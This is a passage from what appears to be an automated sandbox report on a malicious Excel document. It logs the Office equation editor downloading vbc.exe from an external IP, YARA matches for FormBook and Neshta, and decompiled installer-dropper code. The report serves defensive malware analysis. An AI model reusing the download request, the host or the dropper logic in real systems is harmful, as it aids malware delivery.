            Sep 27, 2021 21:08:42.116766930 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.116952896 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.131865978 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.131926060 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.131964922 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.132005930 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.132045984 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.132059097 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.132097006 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.132102966 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.132112026 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.132143021 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.132157087 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.132200003 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.133241892 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.133284092 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.133312941 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.133325100 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.133337021 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.133363962 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.133374929 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.133408070 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.237364054 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.237430096 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.252968073 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.252995968 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.253016949 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.253021955 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.253037930 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.253042936 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.253062010 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.253077030 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.253107071 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.253125906 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.253143072 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.253148079 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.253180027 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.253374100 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.254421949 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.254443884 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.254467010 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.254477978 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.254482031 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.254522085 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.254534006 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.254539967 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.254561901 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.254575968 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.389844894 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389870882 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389889002 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389906883 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389924049 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389942884 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389951944 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.389962912 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389976025 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.389992952 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.390001059 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390006065 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390010118 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390011072 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.390012026 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390021086 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390038967 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390042067 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390054941 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390068054 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.390084028 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390084982 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.390105009 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390114069 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.390124083 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.390142918 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510437012 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510519981 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510533094 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510571957 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510576963 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510587931 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510636091 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510656118 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510678053 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510694981 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510725975 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510732889 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510737896 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510777950 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510780096 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510812044 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510852098 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510869026 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.510889053 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.510902882 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.513681889 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.516159058 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.631812096 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.632013083 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:42.938872099 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:42.939076900 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:43.059823036 CEST804916723.94.159.204192.168.2.22
            Sep 27, 2021 21:08:43.060022116 CEST4916780192.168.2.2223.94.159.204
            Sep 27, 2021 21:08:43.720458031 CEST4916780192.168.2.2223.94.159.204

            HTTP Request Dependency Graph

            • 23.94.159.204

            HTTP Packets

            Session ID: 0
            Source IP: 192.168.2.22
            Source Port: 49167
            Destination IP: 23.94.159.204
            Destination Port: 80
            Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

            Timestamp: Sep 27, 2021 21:08:39.563868999 CEST
            kBytes transferred: 0
            Direction: OUT
            Data:
            GET /poc/vbc.exe HTTP/1.1
            Accept: */*
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Host: 23.94.159.204
            Connection: Keep-Alive

            Timestamp: Sep 27, 2021 21:08:39.688463926 CEST
            kBytes transferred: 1
            Direction: IN
            Data:
            HTTP/1.1 200 OK
            Date: Mon, 27 Sep 2021 19:08:39 GMT
            Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/8.0.10
            Last-Modified: Mon, 27 Sep 2021 07:27:42 GMT
            ETag: "46591-5ccf50857974b"
            Accept-Ranges: bytes
            Content-Length: 288145
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/x-msdownload


            System Behavior

            General

            Start time:21:08:18
            Start date:27/09/2021
            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            Wow64 process (32bit):false
            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
            Imagebase:0x13f170000
            File size:28253536 bytes
            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Start time:21:08:38
            Start date:27/09/2021
            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Wow64 process (32bit):true
            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Imagebase:0x400000
            File size:543304 bytes
            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:21:08:43
            Start date:27/09/2021
            Path:C:\Users\Public\vbc.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\Public\vbc.exe'
            Imagebase:0x400000
            File size:288145 bytes
            MD5 hash:A9DCC61F31601E771050463C4D41CDB0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000004.00000002.469258298.0000000002770000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 42%, Virustotal, Browse
            • Detection: 20%, ReversingLabs
            Reputation:low

            General

            Start time:21:08:44
            Start date:27/09/2021
            Path:C:\Users\Public\vbc.exe
            Wow64 process (32bit):true
            Commandline:'C:\Users\Public\vbc.exe'
            Imagebase:0x400000
            File size:288145 bytes
            MD5 hash:A9DCC61F31601E771050463C4D41CDB0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: 00000005.00000000.466845988.00000000001C0000.00000040.00000001.sdmp, Author: Florian Roth
            Reputation:low

            Disassembly

            Code Analysis

              Executed Functions

              C-Code - Quality: 78%
              			_entry_() {
              				intOrPtr _t47;
              				CHAR* _t51;
              				char* _t54;
              				CHAR* _t56;
              				void* _t60;
              				intOrPtr _t62;
              				int _t64;
              				char* _t67;
              				char* _t68;
              				int _t69;
              				char* _t71;
              				char* _t74;
              				intOrPtr _t87;
              				int _t91;
              				intOrPtr _t93;
              				void* _t95;
              				void* _t107;
              				intOrPtr* _t108;
              				char _t111;
              				CHAR* _t116;
              				char* _t117;
              				CHAR* _t118;
              				char* _t119;
              				void* _t121;
              				char* _t123;
              				char* _t125;
              				char* _t126;
              				void* _t128;
              				void* _t129;
              				intOrPtr _t138;
              				char _t147;
              
              				 *(_t129 + 0x20) = 0;
              				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
              				 *(_t129 + 0x1c) = 0;
              				 *(_t129 + 0x18) = 0x20;
              				SetErrorMode(0x8001); // executed
              				if(GetVersion() != 6) {
              					_t108 = E00405F57(0);
              					if(_t108 != 0) {
              						 *_t108(0xc00);
              					}
              				}
              				_t118 = "UXTHEME";
              				goto L4;
              				while(1) {
              					L22:
              					_t111 =  *_t56;
              					_t134 = _t111;
              					if(_t111 == 0) {
              						break;
              					}
              					__eflags = _t111 - 0x20;
              					if(_t111 != 0x20) {
              						L10:
              						__eflags =  *_t56 - 0x22;
              						 *((char*)(_t129 + 0x14)) = 0x20;
              						if( *_t56 == 0x22) {
              							_t56 =  &(_t56[1]);
              							__eflags = _t56;
              							 *((char*)(_t129 + 0x14)) = 0x22;
              						}
              						__eflags =  *_t56 - 0x2f;
              						if( *_t56 != 0x2f) {
              							L20:
              							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
              							__eflags =  *_t56 - 0x22;
              							if(__eflags == 0) {
              								_t56 =  &(_t56[1]);
              								__eflags = _t56;
              							}
              							continue;
              						} else {
              							_t56 =  &(_t56[1]);
              							__eflags =  *_t56 - 0x53;
              							if( *_t56 == 0x53) {
              								__eflags = (_t56[1] | 0x00000020) - 0x20;
              								if((_t56[1] | 0x00000020) == 0x20) {
              									_t14 = _t129 + 0x18;
              									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
              									__eflags =  *_t14;
              								}
              							}
              							__eflags =  *_t56 - 0x4352434e;
              							if( *_t56 == 0x4352434e) {
              								__eflags = (_t56[4] | 0x00000020) - 0x20;
              								if((_t56[4] | 0x00000020) == 0x20) {
              									_t17 = _t129 + 0x18;
              									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
              									__eflags =  *_t17;
              								}
              							}
              							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
              							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
              								 *((intOrPtr*)(_t56 - 2)) = 0;
              								_t57 =  &(_t56[2]);
              								__eflags =  &(_t56[2]);
              								E00405BC7("C:\\Users\\Albus\\AppData\\Local\\Temp", _t57);
              								L25:
              								_t116 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
              								GetTempPathA(0x400, _t116); // executed
              								_t60 = E004030F9(_t134);
              								_t135 = _t60;
              								if(_t60 != 0) {
              									L27:
              									DeleteFileA("1033"); // executed
              									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
              									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
              									if(_t62 != 0) {
              										L37:
              										E00403540();
              										__imp__OleUninitialize();
              										_t143 =  *((intOrPtr*)(_t129 + 0x10));
              										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
              											__eflags =  *0x42ecb4; // 0x0
              											if(__eflags == 0) {
              												L64:
              												_t64 =  *0x42eccc; // 0xffffffff
              												__eflags = _t64 - 0xffffffff;
              												if(_t64 != 0xffffffff) {
              													 *(_t129 + 0x1c) = _t64;
              												}
              												ExitProcess( *(_t129 + 0x1c));
              											}
              											_t126 = E00405F57(5);
              											_t119 = E00405F57(6);
              											_t67 = E00405F57(7);
              											__eflags = _t126;
              											_t117 = _t67;
              											if(_t126 != 0) {
              												__eflags = _t119;
              												if(_t119 != 0) {
              													__eflags = _t117;
              													if(_t117 != 0) {
              														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
              														__eflags = _t74;
              														if(_t74 != 0) {
              															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
              															 *(_t129 + 0x3c) = 1;
              															 *(_t129 + 0x48) = 2;
              															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
              														}
              													}
              												}
              											}
              											_t68 = E00405F57(8);
              											__eflags = _t68;
              											if(_t68 == 0) {
              												L62:
              												_t69 = ExitWindowsEx(2, 0x80040002);
              												__eflags = _t69;
              												if(_t69 != 0) {
              													goto L64;
              												}
              												goto L63;
              											} else {
              												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
              												__eflags = _t71;
              												if(_t71 == 0) {
              													L63:
              													E0040140B(9);
              													goto L64;
              												}
              												goto L62;
              											}
              										}
              										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
              										ExitProcess(2);
              									}
              									_t138 =  *0x42ec3c; // 0x0
              									if(_t138 == 0) {
              										L36:
              										 *0x42eccc =  *0x42eccc | 0xffffffff;
              										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
              										goto L37;
              									}
              									_t123 = E004056E5(_t125, 0);
              									while(_t123 >= _t125) {
              										__eflags =  *_t123 - 0x3d3f5f20;
              										if(__eflags == 0) {
              											break;
              										}
              										_t123 = _t123 - 1;
              										__eflags = _t123;
              									}
              									_t140 = _t123 - _t125;
              									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
              									if(_t123 < _t125) {
              										_t121 = E0040540F(_t143);
              										lstrcatA(_t116, "~nsu");
              										if(_t121 != 0) {
              											lstrcatA(_t116, "A");
              										}
              										lstrcatA(_t116, ".tmp");
              										_t127 = "C:\\Users\\Public";
              										if(lstrcmpiA(_t116, "C:\\Users\\Public") != 0) {
              											_push(_t116);
              											if(_t121 == 0) {
              												E004053F2();
              											} else {
              												E00405375();
              											}
              											SetCurrentDirectoryA(_t116);
              											_t147 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
              											if(_t147 == 0) {
              												E00405BC7("C:\\Users\\Albus\\AppData\\Local\\Temp", _t127);
              											}
              											E00405BC7(0x42f000,  *(_t129 + 0x20));
              											 *0x42f400 = 0x41;
              											_t128 = 0x1a;
              											do {
              												_t87 =  *0x42ec30; // 0x504d60
              												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t87 + 0x120)));
              												DeleteFileA(0x428c58);
              												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
              													_t91 = CopyFileA("C:\\Users\\Public\\vbc.exe", 0x428c58, 1);
              													_t149 = _t91;
              													if(_t91 != 0) {
              														_push(0);
              														_push(0x428c58);
              														E00405915(_t149);
              														_t93 =  *0x42ec30; // 0x504d60
              														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t93 + 0x124)));
              														_t95 = E00405427(0x428c58);
              														if(_t95 != 0) {
              															CloseHandle(_t95);
              															 *((intOrPtr*)(_t129 + 0x10)) = 0;
              														}
              													}
              												}
              												 *0x42f400 =  *0x42f400 + 1;
              												_t128 = _t128 - 1;
              												_t151 = _t128;
              											} while (_t128 != 0);
              											_push(0);
              											_push(_t116);
              											E00405915(_t151);
              										}
              										goto L37;
              									}
              									 *_t123 = 0;
              									_t124 =  &(_t123[4]);
              									if(E0040579B(_t140,  &(_t123[4])) == 0) {
              										goto L37;
              									}
              									E00405BC7("C:\\Users\\Albus\\AppData\\Local\\Temp", _t124);
              									E00405BC7("C:\\Users\\Albus\\AppData\\Local\\Temp", _t124);
              									 *((intOrPtr*)(_t129 + 0x10)) = 0;
              									goto L36;
              								}
              								GetWindowsDirectoryA(_t116, 0x3fb);
              								lstrcatA(_t116, "\\Temp");
              								_t107 = E004030F9(_t135);
              								_t136 = _t107;
              								if(_t107 == 0) {
              									goto L37;
              								}
              								goto L27;
              							} else {
              								goto L20;
              							}
              						}
              					} else {
              						goto L9;
              					}
              					do {
              						L9:
              						_t56 =  &(_t56[1]);
              						__eflags =  *_t56 - 0x20;
              					} while ( *_t56 == 0x20);
              					goto L10;
              				}
              				goto L25;
              				L4:
              				E00405EE9(_t118); // executed
              				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
              				if( *_t118 != 0) {
              					goto L4;
              				} else {
              					E00405F57(0xd);
              					_t47 = E00405F57(0xb);
              					 *0x42ec24 = _t47;
              					__imp__#17();
              					__imp__OleInitialize(0); // executed
              					 *0x42ecd8 = _t47;
              					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
              					E00405BC7("qghopzytl Setup", "NSIS Error");
              					_t51 = GetCommandLineA();
              					_t125 = "\"C:\\Users\\Public\\vbc.exe\" ";
              					E00405BC7(_t125, _t51);
              					 *0x42ec20 = GetModuleHandleA(0);
              					_t54 = _t125;
              					if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
              						 *((char*)(_t129 + 0x14)) = 0x22;
              						_t54 =  &M00434001;
              					}
              					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
              					 *(_t129 + 0x20) = _t56;
              					goto L22;
              				}
              			}

              APIs
              • SetErrorMode.KERNELBASE ref: 00403150
              • GetVersion.KERNEL32 ref: 00403156
              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
              • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
              • OleInitialize.OLE32(00000000), ref: 004031A7
              • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
              • GetCommandLineA.KERNEL32(qghopzytl Setup,NSIS Error), ref: 004031D8
              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\Public\vbc.exe" ,00000000), ref: 004031EB
              • CharNextA.USER32(00000000), ref: 00403216
              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004032AD
              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
              • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
              • OleUninitialize.OLE32 ref: 00403366
              • ExitProcess.KERNEL32 ref: 00403386
              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 00403399
              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 004033A8
              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 004033B3
              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 004033BF
              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
              • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
              • CopyFileA.KERNEL32 ref: 00403439
              • CloseHandle.KERNEL32(00000000), ref: 00403466
              • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
              • ExitProcess.KERNEL32 ref: 0040353A
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
              • String ID: $ /D=$ _?=$"$"C:\Users\Public\vbc.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$`MP$qghopzytl Setup$~nsu
              • API String ID: 3469842172-3566527386
              • Opcode ID: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
              • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
              • Opcode Fuzzy Hash: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
              • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
              				signed int _v8;
              				signed int _v12;
              				struct _WIN32_FIND_DATAA _v332;
              				signed int _t37;
              				char* _t49;
              				signed int _t52;
              				signed int _t55;
              				signed int _t61;
              				signed int _t63;
              				void* _t65;
              				signed int _t68;
              				CHAR* _t70;
              				CHAR* _t72;
              				char* _t75;
              
              				_t72 = _a4;
              				_t37 = E0040579B(__eflags, _t72);
              				_v12 = _t37;
              				if((_a8 & 0x00000008) != 0) {
              					_t63 = DeleteFileA(_t72); // executed
              					asm("sbb eax, eax");
              					_t65 =  ~_t63 + 1;
              					 *0x42eca8 =  *0x42eca8 + _t65;
              					return _t65;
              				}
              				_t68 = _a8 & 0x00000001;
              				__eflags = _t68;
              				_v8 = _t68;
              				if(_t68 == 0) {
              					L5:
              					E00405BC7(0x42b0a8, _t72);
              					__eflags = _t68;
              					if(_t68 == 0) {
              						E00405701(_t72);
              					} else {
              						lstrcatA(0x42b0a8, "\*.*");
              					}
              					__eflags =  *_t72;
              					if( *_t72 != 0) {
              						L10:
              						lstrcatA(_t72, 0x409010);
              						L11:
              						_t70 =  &(_t72[lstrlenA(_t72)]);
              						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
              						__eflags = _t37 - 0xffffffff;
              						_a4 = _t37;
              						if(_t37 == 0xffffffff) {
              							L29:
              							__eflags = _v8;
              							if(_v8 != 0) {
              								_t31 = _t70 - 1;
              								 *_t31 =  *(_t70 - 1) & 0x00000000;
              								__eflags =  *_t31;
              							}
              							goto L31;
              						} else {
              							goto L12;
              						}
              						do {
              							L12:
              							_t75 =  &(_v332.cFileName);
              							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
              							__eflags =  *_t49;
              							if( *_t49 != 0) {
              								__eflags = _v332.cAlternateFileName;
              								if(_v332.cAlternateFileName != 0) {
              									_t75 =  &(_v332.cAlternateFileName);
              								}
              							}
              							__eflags =  *_t75 - 0x2e;
              							if( *_t75 != 0x2e) {
              								L19:
              								E00405BC7(_t70, _t75);
              								__eflags = _v332.dwFileAttributes & 0x00000010;
              								if((_v332.dwFileAttributes & 0x00000010) == 0) {
              									E0040587F(_t72);
              									_t52 = DeleteFileA(_t72);
              									__eflags = _t52;
              									if(_t52 != 0) {
              										E00404EB3(0xfffffff2, _t72);
              									} else {
              										__eflags = _a8 & 0x00000004;
              										if((_a8 & 0x00000004) == 0) {
              											 *0x42eca8 =  *0x42eca8 + 1;
              										} else {
              											E00404EB3(0xfffffff1, _t72);
              											E00405915(__eflags, _t72, 0);
              										}
              									}
              								} else {
              									__eflags = (_a8 & 0x00000003) - 3;
              									if(__eflags == 0) {
              										E004054EC(_t70, __eflags, _t72, _a8);
              									}
              								}
              								goto L27;
              							}
              							_t61 =  *((intOrPtr*)(_t75 + 1));
              							__eflags = _t61;
              							if(_t61 == 0) {
              								goto L27;
              							}
              							__eflags = _t61 - 0x2e;
              							if(_t61 != 0x2e) {
              								goto L19;
              							}
              							__eflags =  *((char*)(_t75 + 2));
              							if( *((char*)(_t75 + 2)) == 0) {
              								goto L27;
              							}
              							goto L19;
              							L27:
              							_t55 = FindNextFileA(_a4,  &_v332);
              							__eflags = _t55;
              						} while (_t55 != 0);
              						_t37 = FindClose(_a4);
              						goto L29;
              					}
              					__eflags =  *0x42b0a8 - 0x5c;
              					if( *0x42b0a8 != 0x5c) {
              						goto L11;
              					}
              					goto L10;
              				} else {
